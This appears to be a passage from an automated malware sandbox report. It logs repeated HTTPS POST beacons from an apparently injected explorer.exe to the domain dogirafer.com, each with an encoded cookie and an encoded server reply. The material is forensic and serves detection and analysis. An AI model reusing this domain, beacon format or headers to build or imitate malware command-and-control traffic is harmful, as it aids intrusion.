                                                                                                                                                                              2024-12-03 16:45:51 UTC343INData Raw: 31 35 30 0d 0a 4d 69 57 62 51 63 71 7a 32 59 70 67 59 68 72 65 67 6d 61 73 79 6e 56 4b 50 55 6e 51 41 55 36 71 62 2f 6d 7a 75 79 54 4a 4b 52 69 62 37 78 75 50 6f 41 32 31 6a 34 62 55 69 7a 4a 71 4c 6b 4d 72 66 5a 4b 4f 67 6c 63 6b 44 72 43 32 74 65 30 4f 74 5a 53 73 6f 73 45 36 67 69 56 58 46 47 74 49 37 63 62 73 44 47 6c 31 64 48 45 73 51 51 6e 32 75 59 53 4a 44 43 48 52 71 33 63 4d 4e 4a 6b 63 34 72 38 34 78 55 4b 30 75 2f 43 62 58 32 73 68 6f 41 6d 6c 42 68 76 34 46 63 41 34 42 4f 4c 6a 4b 48 4d 56 62 72 54 45 63 33 56 68 37 34 4e 42 36 6c 48 55 43 58 5a 43 68 45 73 2b 4d 31 31 45 41 37 62 6c 49 75 66 36 58 54 57 4d 49 6e 61 74 56 58 36 63 49 68 51 63 50 79 58 6a 7a 41 68 31 54 71 4e 65 68 73 36 62 33 72 52 4a 4e 4e 62 46 78 76 62 6c 4f 2f 56 57 51 35
                                                                                                                                                                              Data Ascii: 150MiWbQcqz2YpgYhregmasynVKPUnQAU6qb/mzuyTJKRib7xuPoA21j4bUizJqLkMrfZKOglckDrC2te0OtZSsosE6giVXFGtI7cbsDGl1dHEsQQn2uYSJDCHRq3cMNJkc4r84xUK0u/CbX2shoAmlBhv4FcA4BOLjKHMVbrTEc3Vh74NB6lHUCXZChEs+M11EA7blIuf6XTWMInatVX6cIhQcPyXjzAh1TqNehs6b3rRJNNbFxvblO/VWQ5
                                                                                                                                                                              2024-12-03 16:45:51 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                              Data Ascii: 0


                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                              18192.168.2.450002104.21.68.894432580C:\Windows\explorer.exe
                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                              2024-12-03 16:45:53 UTC410OUTPOST /test/ HTTP/1.1
                                                                                                                                                                              Accept: */*
                                                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                              Cookie: aXLYGobmm+hnZgqczCa1wndZbQ+OUCykGorGviDPYCHUnWKM12il6/zrxDJoIzJZfJOUlQFhBbSp4ONZ656uso19uGMKTT4Y4pn/bwZTAFoNUkz67MPOTGTcsGxGZcpO8bgvihL3rbWBQnlm4x64W3ORV5FvWue3fktILuaWLzMztNgb
                                                                                                                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
                                                                                                                                                                              Host: dogirafer.com
                                                                                                                                                                              Content-Length: 0
                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                              2024-12-03 16:45:55 UTC783INHTTP/1.1 200 OK
                                                                                                                                                                              Date: Tue, 03 Dec 2024 16:45:54 GMT
                                                                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                              Connection: close
                                                                                                                                                                              CF-Cache-Status: DYNAMIC
                                                                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=A0ps0F9nmq0wk549tlv7HQZA3DY8PebFbR8emKPSpHgWbOuptWr10uOXaZjYp0ayShv9IZWEDF%2F2BUJrOvHv6ZIvl0W2s3Wf%2FnpW4cEMcVMCxP4Xm4lDtSYUr%2BGH1LLi"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                              Server: cloudflare
                                                                                                                                                                              CF-RAY: 8ec5079a6a9580df-EWR
                                                                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1555&min_rtt=1553&rtt_var=587&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2830&recv_bytes=1048&delivery_rate=1855146&cwnd=211&unsent_bytes=0&cid=07059107a60a89b6&ts=1635&x=0"
                                                                                                                                                                              2024-12-03 16:45:55 UTC343INData Raw: 31 35 30 0d 0a 4f 79 79 63 52 63 57 37 30 49 70 75 59 68 37 62 67 57 2f 68 67 33 4e 4f 4f 45 7a 58 42 69 62 43 61 66 79 37 75 79 48 4c 59 47 6d 63 70 68 53 47 70 42 36 79 69 4a 69 56 6a 41 31 70 4a 6b 38 76 65 5a 66 6d 37 46 67 6d 44 62 71 2b 73 61 64 47 75 35 65 71 70 4d 6b 2f 37 55 35 64 47 32 64 4a 36 38 61 6d 66 57 34 71 63 32 38 7a 62 6b 57 36 72 5a 69 4a 43 43 4b 59 76 6e 64 52 49 35 30 4a 38 37 67 2f 30 6c 47 34 2b 4c 32 58 58 53 6c 36 73 52 2b 69 58 54 6e 2f 4b 63 73 35 41 75 50 67 49 52 6c 2b 62 37 50 44 65 33 49 6f 35 73 74 4f 37 31 54 61 44 42 74 46 37 45 41 38 4e 56 38 4e 50 49 6a 4d 66 61 48 38 63 30 69 6a 4e 6a 4f 6c 54 58 6e 53 66 55 68 43 66 32 33 75 30 51 35 36 57 62 41 57 67 4e 50 59 6b 71 39 42 61 4e 61 50 75 49 6a 38 41 73 31 52 51 35
                                                                                                                                                                              Data Ascii: 150OyycRcW70IpuYh7bgW/hg3NOOEzXBibCafy7uyHLYGmcphSGpB6yiJiVjA1pJk8veZfm7FgmDbq+sadGu5eqpMk/7U5dG2dJ68amfW4qc28zbkW6rZiJCCKYvndRI50J87g/0lG4+L2XXSl6sR+iXTn/Kcs5AuPgIRl+b7PDe3Io5stO71TaDBtF7EA8NV8NPIjMfaH8c0ijNjOlTXnSfUhCf23u0Q56WbAWgNPYkq9BaNaPuIj8As1RQ5
                                                                                                                                                                              2024-12-03 16:45:55 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                              Data Ascii: 0


                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                              19192.168.2.450008104.21.68.894432580C:\Windows\explorer.exe
                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                              2024-12-03 16:45:56 UTC410OUTPOST /test/ HTTP/1.1
                                                                                                                                                                              Accept: */*
                                                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                              Cookie: aXLYGobmm+hnZQqczCa1wndZbQ+OUCykGorGviDPYCHUnWKM12il6/zrxDJoIzJZfJOUlQFhBbSp4ONZ656uso19uGMKTT4Y4pn/bwZTAFoNUkz67MPOTGTcsGxGZcpO8bgvihL3rbWBQnlm4x64W3ORV5FvWue3fktILuaWLzMztNgb
                                                                                                                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
                                                                                                                                                                              Host: dogirafer.com
                                                                                                                                                                              Content-Length: 0
                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                              2024-12-03 16:45:57 UTC790INHTTP/1.1 200 OK
                                                                                                                                                                              Date: Tue, 03 Dec 2024 16:45:57 GMT
                                                                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                              Connection: close
                                                                                                                                                                              CF-Cache-Status: DYNAMIC
                                                                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=24cA4821cATGzI59FJpx1U0ZQ%2FYwI3cne4FpJqxlazFGKr%2Bs2w56tW1IKdHVAVEJZXYuS6wC1sLUCs0bVFo%2BOt1JkKuH13I4kzazxpH%2FpBMdU4nlxmU%2BvjikG0xDP%2BHv"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                              Server: cloudflare
                                                                                                                                                                              CF-RAY: 8ec507adab2c41bb-EWR
                                                                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=11439&min_rtt=6528&rtt_var=5956&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2829&recv_bytes=1048&delivery_rate=447303&cwnd=200&unsent_bytes=0&cid=776cfaee33aca17e&ts=1405&x=0"
                                                                                                                                                                              2024-12-03 16:45:57 UTC343INData Raw: 31 35 30 0d 0a 4d 69 71 64 51 4d 4f 36 33 59 70 6b 59 68 72 59 6a 57 2f 6c 67 33 46 4f 4f 30 72 58 41 43 6a 43 61 76 69 32 76 69 58 49 59 6d 6d 63 70 68 53 47 70 42 36 79 69 4a 69 56 6a 41 31 73 4c 6b 51 6f 65 35 65 4f 68 31 73 6b 41 4c 4b 38 73 2b 30 4c 73 70 47 72 70 38 6f 37 67 69 68 54 47 32 4e 4a 36 63 58 73 44 47 6c 31 64 48 45 73 51 51 6e 32 75 59 53 4a 44 43 48 52 71 33 63 4d 4e 4a 6b 63 34 72 38 34 78 55 4b 30 75 2f 43 62 58 32 73 68 6f 41 6d 6c 42 68 76 34 46 4d 30 30 41 2b 76 6d 54 68 6b 56 62 4c 4c 48 66 33 52 68 37 6f 39 50 36 6c 4c 5a 43 6e 5a 44 68 45 77 34 4d 46 77 50 63 72 47 36 4a 66 6e 6c 63 6e 6a 42 4e 6d 71 74 55 58 33 56 4e 78 52 58 4e 43 33 74 31 78 74 79 54 62 51 43 79 38 4b 5a 6e 4f 39 59 49 74 47 65 35 50 48 5a 50 66 42 61 52 5a
                                                                                                                                                                              Data Ascii: 150MiqdQMO63YpkYhrYjW/lg3FOO0rXACjCavi2viXIYmmcphSGpB6yiJiVjA1sLkQoe5eOh1skALK8s+0LspGrp8o7gihTG2NJ6cXsDGl1dHEsQQn2uYSJDCHRq3cMNJkc4r84xUK0u/CbX2shoAmlBhv4FM00A+vmThkVbLLHf3Rh7o9P6lLZCnZDhEw4MFwPcrG6JfnlcnjBNmqtUX3VNxRXNC3t1xtyTbQCy8KZnO9YItGe5PHZPfBaRZ
                                                                                                                                                                              2024-12-03 16:45:57 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                              Data Ascii: 0


                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                              20192.168.2.450016104.21.68.894432580C:\Windows\explorer.exe
                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                              2024-12-03 16:45:59 UTC410OUTPOST /test/ HTTP/1.1
                                                                                                                                                                              Accept: */*
                                                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                              Cookie: aXLYGobmm+hnZAqczCa1wndZbQ+OUCykGorGviDPYCHUnWKM12il6/zrxDJoIzJZfJOUlQFhBbSp4ONZ656uso19uGMKTT4Y4pn/bwZTAFoNUkz67MPOTGTcsGxGZcpO8bgvihL3rbWBQnlm4x64W3ORV5FvWue3fktILuaWLzMztNgb
                                                                                                                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
                                                                                                                                                                              Host: dogirafer.com
                                                                                                                                                                              Content-Length: 0
                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                              2024-12-03 16:46:00 UTC792INHTTP/1.1 200 OK
                                                                                                                                                                              Date: Tue, 03 Dec 2024 16:46:00 GMT
                                                                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                              Connection: close
                                                                                                                                                                              CF-Cache-Status: DYNAMIC
                                                                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=MdSrFsGLAXWkwoJtk7r0BdWIeR1olCLbfgv%2BV2Rwcq0aUWsF%2FA5DyKShtqwoV%2FphrpqJxxiQknr0y73j3jX%2BtmD%2F8K03DeDQbBd%2F%2B4BKl7h3MoxJQo4jAmnkAeCBRhIp"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                              Server: cloudflare
                                                                                                                                                                              CF-RAY: 8ec507bf3dc680da-EWR
                                                                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=5038&min_rtt=1544&rtt_var=2807&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2830&recv_bytes=1048&delivery_rate=1891191&cwnd=130&unsent_bytes=0&cid=8a0edbb0b6f8589e&ts=1660&x=0"
                                                                                                                                                                              2024-12-03 16:46:00 UTC343INData Raw: 31 35 30 0d 0a 50 53 2b 56 51 73 57 32 32 49 70 6c 61 68 6a 66 67 57 4c 69 67 33 64 4b 50 30 6a 51 41 79 6a 43 61 66 65 30 75 53 37 4b 59 57 6d 63 70 68 53 47 70 42 36 79 69 4a 69 56 6a 41 31 71 4a 6b 59 73 66 35 58 6d 37 46 59 6d 44 37 53 32 73 61 4e 47 74 5a 43 76 6f 4d 34 2b 36 30 35 57 46 57 74 50 36 38 66 73 44 47 6c 31 64 48 45 73 51 51 6e 32 75 59 53 4a 44 43 48 52 71 33 63 4d 4e 4a 6b 63 34 72 38 34 78 55 4b 30 75 2f 43 62 58 32 73 68 6f 41 6d 6c 42 68 76 34 47 73 73 78 41 65 50 69 4a 6e 4d 54 61 72 54 45 63 6e 49 6b 71 34 46 45 37 56 4c 62 44 78 77 70 68 55 41 2b 4d 31 6f 4c 4f 63 43 39 65 76 37 37 62 56 65 4d 65 33 36 78 55 58 6e 57 66 67 46 58 66 79 62 6c 32 51 42 68 53 72 63 56 6c 34 2b 56 6e 71 30 44 4d 38 65 5a 76 39 50 65 42 66 39 58 54 70
                                                                                                                                                                              Data Ascii: 150PS+VQsW22IplahjfgWLig3dKP0jQAyjCafe0uS7KYWmcphSGpB6yiJiVjA1qJkYsf5Xm7FYmD7S2saNGtZCvoM4+605WFWtP68fsDGl1dHEsQQn2uYSJDCHRq3cMNJkc4r84xUK0u/CbX2shoAmlBhv4GssxAePiJnMTarTEcnIkq4FE7VLbDxwphUA+M1oLOcC9ev77bVeMe36xUXnWfgFXfybl2QBhSrcVl4+Vnq0DM8eZv9PeBf9XTp
                                                                                                                                                                              2024-12-03 16:46:00 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                              Data Ascii: 0


                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                              21192.168.2.450025104.21.68.894432580C:\Windows\explorer.exe
                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                              2024-12-03 16:46:02 UTC410OUTPOST /test/ HTTP/1.1
                                                                                                                                                                              Accept: */*
                                                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                              Cookie: aXLYGobmm+hnawqczCa1wndZbQ+OUCykGorGviDPYCHUnWKM12il6/zrxDJoIzJZfJOUlQFhBbSp4ONZ656uso19uGMKTT4Y4pn/bwZTAFoNUkz67MPOTGTcsGxGZcpO8bgvihL3rbWBQnlm4x64W3ORV5FvWue3fktILuaWLzMztNgb
                                                                                                                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
                                                                                                                                                                              Host: dogirafer.com
                                                                                                                                                                              Content-Length: 0
                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                              2024-12-03 16:46:03 UTC789INHTTP/1.1 200 OK
                                                                                                                                                                              Date: Tue, 03 Dec 2024 16:46:03 GMT
                                                                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                              Connection: close
                                                                                                                                                                              CF-Cache-Status: DYNAMIC
                                                                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=W3%2FJAKybYRht2%2Fd5MiTjcO%2FxmsavA0naqJmurpKDWfC1n84DI%2BZOOe0M6z8kfsmD5417AkazQgsT518lifeFGgJNwSyTnWI2t3Nw%2BIH975JIaKthcJq3h0Ovx%2Fg0YcEY"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                              Server: cloudflare
                                                                                                                                                                              CF-RAY: 8ec507d22d9542ec-EWR
                                                                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1612&min_rtt=1605&rtt_var=617&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2830&recv_bytes=1048&delivery_rate=1750599&cwnd=183&unsent_bytes=0&cid=0d506a1fdc94d059&ts=1625&x=0"
                                                                                                                                                                              2024-12-03 16:46:03 UTC343INData Raw: 31 35 30 0d 0a 50 53 71 64 52 38 75 32 33 6f 70 6c 5a 42 6e 66 67 47 37 6f 67 33 46 4e 4f 30 76 57 41 69 50 43 5a 2f 61 37 76 53 62 50 4b 52 69 62 37 78 75 50 6f 41 32 31 6a 34 62 55 69 7a 52 6e 4a 6b 59 73 65 4a 71 4f 68 31 6b 6e 44 37 57 39 75 65 30 49 74 4a 61 73 70 63 73 37 67 69 6c 58 48 6d 70 49 36 73 50 73 44 47 6c 31 64 48 45 73 51 51 6e 32 75 59 53 4a 44 43 48 52 71 33 63 4d 4e 4a 6b 63 34 72 38 34 78 55 4b 30 75 2f 43 62 58 32 73 68 6f 41 6d 6c 42 68 76 34 45 4d 30 30 41 2b 6e 6b 4b 58 4d 53 62 72 58 45 65 48 41 6c 71 34 35 48 37 6c 4c 56 43 68 45 70 67 45 30 2f 4e 31 34 4a 4f 4d 43 39 65 76 37 37 62 56 65 4d 65 33 36 78 55 58 6e 57 66 67 46 58 66 79 62 6c 32 51 42 68 53 72 63 56 6c 34 2b 56 6e 71 30 44 4d 38 65 5a 76 39 50 65 42 66 52 52 52 4a
                                                                                                                                                                              Data Ascii: 150PSqdR8u23oplZBnfgG7og3FNO0vWAiPCZ/a7vSbPKRib7xuPoA21j4bUizRnJkYseJqOh1knD7W9ue0ItJaspcs7gilXHmpI6sPsDGl1dHEsQQn2uYSJDCHRq3cMNJkc4r84xUK0u/CbX2shoAmlBhv4EM00A+nkKXMSbrXEeHAlq45H7lLVChEpgE0/N14JOMC9ev77bVeMe36xUXnWfgFXfybl2QBhSrcVl4+Vnq0DM8eZv9PeBfRRRJ
                                                                                                                                                                              2024-12-03 16:46:03 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                              Data Ascii: 0


                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                              22192.168.2.450029104.21.68.894432580C:\Windows\explorer.exe
                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                              2024-12-03 16:46:05 UTC410OUTPOST /test/ HTTP/1.1
                                                                                                                                                                              Accept: */*
                                                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                              Cookie: aXLYGobmm+hnagqczCa1wndZbQ+OUCykGorGviDPYCHUnWKM12il6/zrxDJoIzJZfJOUlQFhBbSp4ONZ656uso19uGMKTT4Y4pn/bwZTAFoNUkz67MPOTGTcsGxGZcpO8bgvihL3rbWBQnlm4x64W3ORV5FvWue3fktILuaWLzMztNgb
                                                                                                                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
                                                                                                                                                                              Host: dogirafer.com
                                                                                                                                                                              Content-Length: 0
                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                              2024-12-03 16:46:07 UTC779INHTTP/1.1 200 OK
                                                                                                                                                                              Date: Tue, 03 Dec 2024 16:46:07 GMT
                                                                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                              Connection: close
                                                                                                                                                                              CF-Cache-Status: DYNAMIC
                                                                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=QmbjzkdPrMr1svCLiSupweT8e6H2VAYfL8Y38OdeJXNkMea63tnxYGTMif590s7RBOdc0NMGZSCVBqNi83YVxSAUgJlotImYfWNAqttaXwASvxUd1rNITr6mT%2FJqF1kP"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                              Server: cloudflare
                                                                                                                                                                              CF-RAY: 8ec507e72cf34289-EWR
                                                                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1647&min_rtt=1618&rtt_var=628&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2830&recv_bytes=1048&delivery_rate=1804697&cwnd=145&unsent_bytes=0&cid=be377aa860238dd7&ts=1605&x=0"
                                                                                                                                                                              2024-12-03 16:46:07 UTC343INData Raw: 31 35 30 0d 0a 50 79 53 5a 51 4d 65 78 33 49 70 6b 5a 52 2f 63 6a 47 48 68 67 33 46 49 4f 6b 4c 57 42 43 50 43 62 76 6d 79 76 43 62 4d 5a 57 6d 63 70 68 53 47 70 42 36 79 69 4a 69 56 6a 41 31 6d 4a 55 55 6a 63 70 4b 4f 68 56 38 67 44 72 71 2f 74 2b 30 43 73 4a 57 71 70 63 39 52 35 43 4e 58 47 47 4a 4a 36 34 2b 64 43 7a 5a 79 61 6d 34 44 44 55 58 69 70 59 53 4e 44 32 6a 45 71 79 6f 62 4d 49 77 4e 35 62 67 76 31 6b 37 33 39 76 79 5a 48 54 41 77 74 67 37 2b 4a 42 7a 4b 46 38 38 30 42 4f 2f 6a 54 68 38 54 5a 62 4c 42 65 6e 52 68 35 49 4a 50 37 56 54 56 44 33 5a 4f 67 6b 34 39 4f 46 77 42 63 72 47 36 4a 66 6e 6c 63 6e 6a 42 4e 6d 71 74 55 58 33 56 4e 78 52 58 4e 43 33 74 31 78 74 79 54 62 51 43 79 38 4b 5a 6e 4f 39 59 49 74 47 65 35 50 48 5a 4f 76 46 53 54 70
                                                                                                                                                                              Data Ascii: 150PySZQMex3IpkZR/cjGHhg3FIOkLWBCPCbvmyvCbMZWmcphSGpB6yiJiVjA1mJUUjcpKOhV8gDrq/t+0CsJWqpc9R5CNXGGJJ64+dCzZyam4DDUXipYSND2jEqyobMIwN5bgv1k739vyZHTAwtg7+JBzKF880BO/jTh8TZbLBenRh5IJP7VTVD3ZOgk49OFwBcrG6JfnlcnjBNmqtUX3VNxRXNC3t1xtyTbQCy8KZnO9YItGe5PHZOvFSTp
                                                                                                                                                                              2024-12-03 16:46:07 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                              Data Ascii: 0


                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                              23192.168.2.450030104.21.68.894432580C:\Windows\explorer.exe
                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                              2024-12-03 16:46:08 UTC410OUTPOST /test/ HTTP/1.1
                                                                                                                                                                              Accept: */*
                                                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                              Cookie: aXLYGobmm+hkYwqczCa1wndZbQ+OUCykGorGviDPYCHUnWKM12il6/zrxDJoIzJZfJOUlQFhBbSp4ONZ656uso19uGMKTT4Y4pn/bwZTAFoNUkz67MPOTGTcsGxGZcpO8bgvihL3rbWBQnlm4x64W3ORV5FvWue3fktILuaWLzMztNgb
                                                                                                                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
                                                                                                                                                                              Host: dogirafer.com
                                                                                                                                                                              Content-Length: 0
                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                              2024-12-03 16:46:10 UTC779INHTTP/1.1 200 OK
                                                                                                                                                                              Date: Tue, 03 Dec 2024 16:46:10 GMT
                                                                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                              Connection: close
                                                                                                                                                                              CF-Cache-Status: DYNAMIC
                                                                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Oj8MgmMLXQ5nmiLoqvIYzKQEUWf5LrhOyjlmopYw6YfqUaus852q3m9MM6PBFWzFtwlzZnML9oPcbA76rfK3PnphnobNOmZejIIX3%2FsGeHLaWjCfRAF8CzVqAMMMkwgh"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                              Server: cloudflare
                                                                                                                                                                              CF-RAY: 8ec507fa3f3ef5fa-EWR
                                                                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1531&min_rtt=1510&rtt_var=609&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2831&recv_bytes=1048&delivery_rate=1737061&cwnd=252&unsent_bytes=0&cid=ae04fac05b03da14&ts=1687&x=0"
                                                                                                                                                                              2024-12-03 16:46:10 UTC343INData Raw: 31 35 30 0d 0a 4f 43 53 62 51 63 57 30 30 49 70 76 5a 68 72 65 68 32 43 73 79 6e 64 50 4f 55 6e 56 42 6b 36 73 61 2f 6d 78 76 79 65 41 57 42 2f 53 34 42 4b 4c 73 77 71 79 6b 63 66 54 74 54 35 76 4a 45 49 71 66 2f 7a 6f 68 6c 30 6e 44 4c 4b 2f 2f 61 59 4d 74 35 47 71 72 63 68 52 35 43 42 55 47 6d 56 50 37 6f 2b 64 43 7a 5a 79 61 6d 34 44 44 55 58 69 70 59 53 4e 44 32 6a 45 71 79 6f 62 4d 49 77 4e 35 62 67 76 31 6b 37 33 39 76 79 5a 48 54 41 77 74 67 37 2b 4a 42 7a 4b 45 4d 67 32 42 2b 76 68 54 68 6f 56 61 62 37 43 65 6e 46 68 35 49 5a 48 37 56 76 66 44 58 5a 41 69 30 45 36 4e 46 6f 4c 63 72 47 36 4a 66 6e 6c 63 6e 6a 42 4e 6d 71 74 55 58 33 56 4e 78 52 58 4e 43 33 74 31 78 74 79 54 62 51 43 79 38 4b 5a 6e 4f 39 59 49 74 47 65 35 50 48 5a 4f 66 42 58 52 70
                                                                                                                                                                              Data Ascii: 150OCSbQcW00IpvZhreh2CsyndPOUnVBk6sa/mxvyeAWB/S4BKLswqykcfTtT5vJEIqf/zohl0nDLK//aYMt5GqrchR5CBUGmVP7o+dCzZyam4DDUXipYSND2jEqyobMIwN5bgv1k739vyZHTAwtg7+JBzKEMg2B+vhThoVab7CenFh5IZH7VvfDXZAi0E6NFoLcrG6JfnlcnjBNmqtUX3VNxRXNC3t1xtyTbQCy8KZnO9YItGe5PHZOfBXRp
                                                                                                                                                                              2024-12-03 16:46:10 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                              Data Ascii: 0


                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                              24192.168.2.450031104.21.68.894432580C:\Windows\explorer.exe
                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                              2024-12-03 16:46:11 UTC410OUTPOST /test/ HTTP/1.1
                                                                                                                                                                              Accept: */*
                                                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                              Cookie: aXLYGobmm+hkYgqczCa1wndZbQ+OUCykGorGviDPYCHUnWKM12il6/zrxDJoIzJZfJOUlQFhBbSp4ONZ656uso19uGMKTT4Y4pn/bwZTAFoNUkz67MPOTGTcsGxGZcpO8bgvihL3rbWBQnlm4x64W3ORV5FvWue3fktILuaWLzMztNgb
                                                                                                                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
                                                                                                                                                                              Host: dogirafer.com
                                                                                                                                                                              Content-Length: 0
                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                              2024-12-03 16:46:13 UTC788INHTTP/1.1 200 OK
                                                                                                                                                                              Date: Tue, 03 Dec 2024 16:46:13 GMT
                                                                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                              Connection: close
                                                                                                                                                                              CF-Cache-Status: DYNAMIC
                                                                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=MEchLOFOUAsWtMdkJ%2Fkmud7UTSZZPgA1%2F5p5LxM3Lv2V0bQlcNamkmc%2B7296DMHlJzuE9l5SOU0tL3N8H9Amx%2BLxtdeAawUQxumkPWBrryFPjXajmePe7hupRUFjq%2F6n"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                              Server: cloudflare
                                                                                                                                                                              CF-RAY: 8ec5080d2853de95-EWR
                                                                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=4115&min_rtt=1573&rtt_var=2260&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2830&recv_bytes=1048&delivery_rate=1856325&cwnd=230&unsent_bytes=0&cid=da016690c6f455cf&ts=1442&x=0"
